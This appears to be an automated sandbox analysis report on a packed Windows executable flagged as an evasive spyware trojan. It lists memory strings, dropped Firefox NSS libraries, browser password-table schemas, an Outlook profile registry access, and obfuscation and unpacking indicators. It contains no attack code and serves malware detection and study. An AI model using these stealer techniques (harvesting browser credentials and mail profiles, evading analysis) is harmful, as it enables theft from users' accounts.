Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000001.00000002.2409039339.000000006CB1D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2408818094.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AAEBAKKJ.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: AAEBAKKJ.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AAEBAKKJ.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AAEBAKKJ.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AAEBAKKJ.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AAEBAKKJ.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AAEBAKKJ.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://support.mozilla.org
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: AAEBAKKJ.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: AAEBAKKJ.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://www.mozilla.org
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://www.mozilla.org#
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: CFHIIJDBKEGIDHIDAFCFBGHIJD.1.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000001.00000002.2403036116.00000000292F6000.00000004.00000020.00020000.00000000.sdmp, KECGDBFCBKFIDHIDHDHI.1.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CB0B700
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB0B8C0 rand_s,NtQueryVirtualMemory, 1_2_6CB0B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6CB0B910
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CAAF280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 1_2_00EBD865
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EC2863 1_2_00EC2863
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EB3844 1_2_00EB3844
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F7F9F5 1_2_00F7F9F5
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBA144 1_2_00EBA144
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EB1A89 1_2_00EB1A89
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EB7CA0 1_2_00EB7CA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EAA456 1_2_00EAA456
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EC0D61 1_2_00EC0D61
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00E7DE8A 1_2_00E7DE8A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EB8634 1_2_00EB8634
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EAAE04 1_2_00EAAE04
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EAFFC6 1_2_00EAFFC6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00E62786 1_2_00E62786
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00D8E71E 1_2_00D8E71E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAA35A0 1_2_6CAA35A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB034A0 1_2_6CB034A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB0C4A0 1_2_6CB0C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB6C80 1_2_6CAB6C80
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAAD4E0 1_2_6CAAD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE6CF0 1_2_6CAE6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB64C0 1_2_6CAB64C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CACD4D0 1_2_6CACD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB1542B 1_2_6CB1542B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB1AC00 1_2_6CB1AC00
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE5C10 1_2_6CAE5C10
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAF2C10 1_2_6CAF2C10
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB5440 1_2_6CAB5440
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB1545C 1_2_6CB1545C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB085F0 1_2_6CB085F0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE0DD0 1_2_6CAE0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CABFD00 1_2_6CABFD00
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CACED10 1_2_6CACED10
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAD0512 1_2_6CAD0512
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB04EA0 1_2_6CB04EA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB0E680 1_2_6CB0E680
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAC5E90 1_2_6CAC5E90
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB176E3 1_2_6CB176E3
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAABEF0 1_2_6CAABEF0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CABFEF0 1_2_6CABFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB09E30 1_2_6CB09E30
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAF5600 1_2_6CAF5600
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE7E10 1_2_6CAE7E10
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB16E63 1_2_6CB16E63
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAAC670 1_2_6CAAC670
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAF2E4E 1_2_6CAF2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAC4640 1_2_6CAC4640
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAC9E50 1_2_6CAC9E50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE3E50 1_2_6CAE3E50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAF77A0 1_2_6CAF77A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAADFE0 1_2_6CAADFE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAD6FF0 1_2_6CAD6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB9F00 1_2_6CAB9F00
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE7710 1_2_6CAE7710
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAD60A0 1_2_6CAD60A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CACC0E0 1_2_6CACC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE58E0 1_2_6CAE58E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB150C7 1_2_6CB150C7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAEB820 1_2_6CAEB820
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAF4820 1_2_6CAF4820
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB7810 1_2_6CAB7810
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAEF070 1_2_6CAEF070
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAC8850 1_2_6CAC8850
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CACD850 1_2_6CACD850
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAAC9A0 1_2_6CAAC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CADD9B0 1_2_6CADD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB02990 1_2_6CB02990
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE5190 1_2_6CAE5190
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB1B170 1_2_6CB1B170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CABD960 1_2_6CABD960
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAFB970 1_2_6CAFB970
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CACA940 1_2_6CACA940
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB12AB0 1_2_6CB12AB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAA22A0 1_2_6CAA22A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAD4AA0 1_2_6CAD4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CABCAB0 1_2_6CABCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB1BA90 1_2_6CB1BA90
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAC1AF0 1_2_6CAC1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAEE2F0 1_2_6CAEE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE8AC0 1_2_6CAE8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAE9A60 1_2_6CAE9A60
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAAF380 1_2_6CAAF380
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB153C8 1_2_6CB153C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAED320 1_2_6CAED320
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CABC370 1_2_6CABC370
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAA5340 1_2_6CAA5340
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CADCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CAE94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00AF45C0 appears 316 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000001.00000002.2409598482.000000006CD25000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000001.00000002.2409238614.000000006CB32000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: xposepnz ZLIB complexity 0.9949511177218114
Source: file.exe, 00000001.00000003.2149042786.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2380969091.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6CB07030
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_00B08680
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 1_2_00B03720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\56ZZF6W5.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000001.00000003.2245883391.000000001D258000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2264332795.000000001D273000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2246197895.0000000000805000.00000004.00000020.00020000.00000000.sdmp, GDBAKKKFBGDHJKFHJJJJ.1.dr, DHJECFCGHIDGHIDHDHIE.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000001.00000002.2408729413.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2397845122.000000001D353000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1818624 > 1048576
Source: file.exe Static PE information: Raw size of xposepnz is bigger than: 0x100000 < 0x195c00
Source: Binary string: mozglue.pdbP source: file.exe, 00000001.00000002.2409039339.000000006CB1D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000001.00000002.2409039339.000000006CB1D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.af0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xposepnz:EW;bkobembs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xposepnz:EW;bkobembs:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00B09860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1bc455 should be: 0x1c370c
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xposepnz
Source: file.exe Static PE information: section name: bkobembs
Source: file.exe Static PE information: section name: .taggant
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F390FB push 0D7AB7DEh; mov dword ptr [esp], ebp 1_2_00F39117
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F3F0E0 push 0C251243h; mov dword ptr [esp], edi 1_2_00F3F108
